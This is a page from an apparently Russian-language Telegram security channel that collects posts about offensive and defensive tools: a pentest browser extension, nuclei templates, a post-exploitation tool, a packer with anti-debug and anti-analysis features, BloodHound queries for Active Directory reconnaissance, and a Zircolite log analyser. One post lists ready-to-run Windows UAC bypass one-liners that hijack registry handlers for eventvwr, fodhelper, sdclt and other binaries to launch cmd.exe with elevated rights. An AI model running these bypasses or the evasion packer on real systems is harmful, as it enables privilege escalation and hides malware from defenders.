Вся публикуемая информация предоставляется исключительно в образовательных целях!
За противозаконные действия может грозить уголовная ответственность согласно законодательству вашей страны.
#nav
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Whitehat Lab
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое
Чат: @whitehat_chat
Все материалы предназначены исключительно в образовательных целях
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое
Чат: @whitehat_chat
Все материалы предназначены исключительно в образовательных целях
Please open Telegram to view this post
VIEW IN TELEGRAM
Отличное универсальное расширение для веб пентеста
Возможности:
▪️ Dynamic Reverse Shell generator▪️ Shell Spawning▪️ MSF Venom Builder▪️ XSS Payloads▪️ Basic SQLi payloads▪️ Local file inclusion payloads (LFI)▪️ Data Encoding▪️ Obfuscated Files▪️ Hash Generator▪️ Useful Linux commands
#hacktools #browser #extension
Please open Telegram to view this post
VIEW IN TELEGRAM
Relay через отравление LLMNR - research
#redteam #krbrelayx #llmnr #pentest #responder #relay
Please open Telegram to view this post
VIEW IN TELEGRAM
Приветствую друзья!
В очередных поисках всякого интересного на просторах нашего необъятного интернета нашел отличный репозиторий от наших китайских товарищей с огромным количеством шаблонов для nuclei
Обновляется на ежедневной основе с помощью Github Actions и содержит более 110k! шаблонов. В файле repo.csv указаны источники для обновлений
Все шаблоны разбиты по категориям и вендорам
Установка:
git clone https://github.com/adysec/nuclei_poc
cd nuclei_poc
Примеры:
nuclei -t poc/ -u https://example.com
nuclei -t poc/web/ -u https://example.com
nuclei -t poc/wordpress/ -u https://example.com
#nuclei #pentest #web #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
eventvwr.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe
fodhelper.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe
sdclt.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe
slui.exe
reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe
perfmon.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe
taskmgr.exe
reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe
ComputerDefaults.exe
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe
sysprep.exe
reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.execontrol.exe
cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername
Сброс:
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f
#uac #bypass #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент пост эксплуатации
Установка:
git clone https://github.com/t3l3machus/ACEshark
cd ACEshark
pip3 install -r requirements.txt
Зависимости:
sudo apt-get install xclip
sudo apt-get install xselect
Запуск:
python3 ./ACEshark.py -s 10.10.1.10 -i
# Полученный скрипт выполняем на удаляемом хосте
#soft #python #acrshark
Please open Telegram to view this post
VIEW IN TELEGRAM
Пакер исполняемых
Особенности:
Анти отладка
Анти анализ
Кастомное шифрование
Использование легитимного процесса (explorer по умолчанию)
Установка и запуск:
cd Launcher
cargo build --release
cd Packit
cargo build --release
Packit.exe <EXE_to_Pack> <Launcher.exe>
#soft #rust #packer
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление инструмента для выявления связей и построения графов в
Отличный инструмент при пентесте
Для сбора информации используются коллекторы bloodhound-ce или SharpHound
Установка:
curl -L https://ghst.ly/getbhce | docker compose -f - up
https://localhost:8080/ui/login
Логин admin и сгенерированный пароль
Для обновления переходим в директорию с docker-compose.yml и запускаем:
docker compose pull && docker compose up
Сбор информации:
python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp
Neo4j запросы:
# Domain Admins и время установки пароля
MATCH (g:Group) WHERE g.name =~ "(?i).*DOMAIN ADMINS.*" WITH g MATCH (g)<-
[r:MemberOf*1..]-(u) RETURN u.name AS User,
datetime({epochSeconds:toInteger(u.pwdlastset)}) as passwordLastSet, datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset
# Сервисные УЗ, время установки пароля, дата создания
MATCH (u:User) WHERE u.hasspn=true AND (NOT u.name STARTS WITH 'KRBTGT') RETURN u.name
AS accountName, datetime({epochSeconds: toInteger(u.pwdlastset)}) AS passwordLastSet,
datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset
# Пользователи и описание
MATCH (u:User) RETURN u.name as username, u.description as description
# Domain Admins или Administrators с сессией исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR
g.objectid ENDS WITH '-544'
MATCH p = (c:Computer)-[:HasSession]->(n) WHERE NOT c.name in domainControllers return
p
# Неограниченное делегирование исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name IN domainControllers
RETURN c
# Пользователи с ограниченным делегированием
MATCH p = ((u:User)-[r:AllowedToDelegate]->(c:Computer)) RETURN p
Подробный гайд:
ADCS атаки:
Ссылки:
#bloodhound #pentest #active_directory #soft #bhce
Please open Telegram to view this post
VIEW IN TELEGRAM
Отличный инструмент для исследования логов, особенно крайне кривых и неудобных
Проводит анализ на основе SIGMA правил (основные идут в комплекте)
Также работает с файлами .log, .xml, .json
git clone https://github.com/wagga40/Zircolite
cd Zircolite
pip3 install -r requirements.full.txt
Для WIndows есть собранный бинарь
Примеры:
python3 zircolite.py --evtx system.evtx
python3 zircolite.py --evtx system.evtx --ruleset rules/rules_windows_sysmon_pysigma.json
python3 zircolite.py --events auditd.log --ruleset rules/rules_linux.json --auditd
python3 zircolite.py --events sysmon.log --ruleset rules/rules_linux.json --sysmon4linux
Обновление правил:
python3 zircolite.py -U
#dfir #forensics #zircolite #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Это кроссплатформенная реализация GNU coreutils переписанная на Rust
Реализовано более 100 утилит. Проект стремится работать на как можно большем количестве платформ, чтобы иметь возможность использовать одни и те же утилиты на
cargo install coreutils
~/.cargo/bin/coreutils
Установка via
winget install uutils.coreutils
#coreutils #soft #rust
Please open Telegram to view this post
VIEW IN TELEGRAM